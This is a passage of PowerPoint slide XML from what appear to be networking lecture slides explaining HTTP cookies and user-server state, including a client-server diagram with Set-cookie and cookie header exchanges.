          <p:cNvPr id="23556" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E960F5A-37A0-49B3-BF74-A21BB28111C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2047876" y="1323975"/>
            <a:ext cx="76866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buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>They stay in the first line of the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some codes: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C8BA067-026F-48AC-9668-77AB3B836F38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>User-server state: cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6008FED9-03E4-4717-BD4C-60EBED106F06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="4033838" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400"/>
              <a:t>Many major Web sites use cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Four components:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>1) Set-Cookie: header line of HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" i="1"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t> message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>2) Cookie: header line in HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" i="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t> message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>3) Cookie file kept on user’s host, managed by user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>4) Possible back-end database at Web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25604" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFBC4B5E-1BBC-4936-BA33-13EBDA5316F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6176964" y="1600201"/>
            <a:ext cx="4033837" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400"/>
              <a:t>Susan always accesses Internet from PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400"/>
              <a:t>She visits a specific e-commerce site for first time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400"/>
              <a:t>When initial HTTP requests arrives at site, site creates: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>unique ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>entry in backend database for ID</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5E5173D-42B3-427F-9914-38173A598CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cookies: keeping “state”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D49FC8-583F-4F38-888C-1C31E4AE2D56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3690939" y="1423988"/>
            <a:ext cx="981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400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6142E6FA-945E-4D56-8D80-C112E2ADFFE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7135813" y="1444625"/>
            <a:ext cx="11049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2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38919" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59AF5C58-0B43-4775-86F2-45DF9BAFC31A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4319588" y="2008189"/>
            <a:ext cx="2686050" cy="3143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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72266FDE-D0F0-4D93-8937-66E21FC3D2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4081464" y="1992314"/>
            <a:ext cx="3305175" cy="396875"/>
            <a:chOff x="1611" y="1255"/>
            <a:chExt cx="2082" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27712" name="Line 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F58037-FAFF-4CE9-96F5-04BBF7093F5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1611" y="126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7713" name="Text Box 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32310F83-AA69-4F20-914B-2D727176938D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1765" y="1255"/>
              <a:ext cx="1689"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1800">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>usual http request msg</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72888F30-82EA-4B6C-8CF7-915B82B27AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4443414" y="2428876"/>
            <a:ext cx="2505075" cy="557213"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF98E85B-1151-42BF-A929-69092B65E5EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4110039" y="2392363"/>
            <a:ext cx="3305175" cy="677862"/>
            <a:chOff x="1629" y="1507"/>
            <a:chExt cx="2082" cy="427"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27710" name="Line 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C69EA05-9EC6-4FFC-B13B-F9D346AEEE77}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1629" y="154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7711" name="Text Box 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53076540-8FDF-4895-A918-E24D8DD0F28A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1789" y="1507"/>
              <a:ext cx="1665" cy="42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r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>usual http response</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Set-cookie: 1678 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5DC7B2-04C9-4E7D-BD82-EFA0A5BEDC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4090989" y="3402013"/>
            <a:ext cx="3305175" cy="622300"/>
            <a:chOff x="1617" y="2143"/>
            <a:chExt cx="2082" cy="392"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27706" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB4693B-0E35-442B-B9A8-5EA215051CD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1617" y="2267"/>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27707" name="Group 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D85580-2944-4FC6-AA72-6B7265B0FD23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1783" y="2143"/>
              <a:ext cx="1689" cy="392"/>
              <a:chOff x="3124" y="2762"/>
              <a:chExt cx="1689" cy="392"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27708" name="Rectangle 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D155C8-D95F-42D4-BB0E-BACBDCBC84C6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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709" name="Text Box 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D55826-B172-4A9D-9068-85A317694A3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3124" y="2762"/>
                <a:ext cx="1689" cy="39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lnSpc>
                    <a:spcPct val="80000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>usual http request msg</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>cookie: 1678</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC209C6D-B89E-40EB-9592-D73F7ED52D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4081464" y="4084639"/>
            <a:ext cx="3305175" cy="407987"/>
            <a:chOff x="1611" y="2573"/>
            <a:chExt cx="2082" cy="257"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27702" name="Line 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD83212D-2381-4F39-BCFC-074C380801F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1611" y="257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27703" name="Group 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B729BB31-C169-45A4-B531-D201521B1250}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1747" y="2593"/>
              <a:ext cx="1743" cy="237"/>
              <a:chOff x="3268" y="2846"/>
              <a:chExt cx="1743" cy="237"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27704" name="Rectangle 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AAEA0DE-2600-49E8-B922-1E485BC6AEEB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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705" name="Text Box 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6FDA176-3B33-4A11-A967-23DD3997B5A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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1800">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>usual http response msg</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="it-IT" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E570A476-056A-4A71-87FA-225E69066659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4062414" y="4906963"/>
            <a:ext cx="3305175" cy="622300"/>
            <a:chOff x="1599" y="3091"/>
            <a:chExt cx="2082" cy="392"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27698" name="Line 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21DE953C-CDD8-4DA3-97AE-711972ABA59D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1599" y="3203"/>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27699" name="Group 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A4291F-02BC-4C69-B8CD-206F5328A5AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1771" y="3091"/>
              <a:ext cx="1689" cy="392"/>
              <a:chOff x="3124" y="2762"/>
              <a:chExt cx="1689" cy="392"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27700" name="Rectangle 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61B4AF6-2CDD-4244-A2C3-67945EF5DA26}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3186" y="2791"/>
                <a:ext cx="1578" cy="351"/>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701" name="Text Box 23">
                <a:extLst>
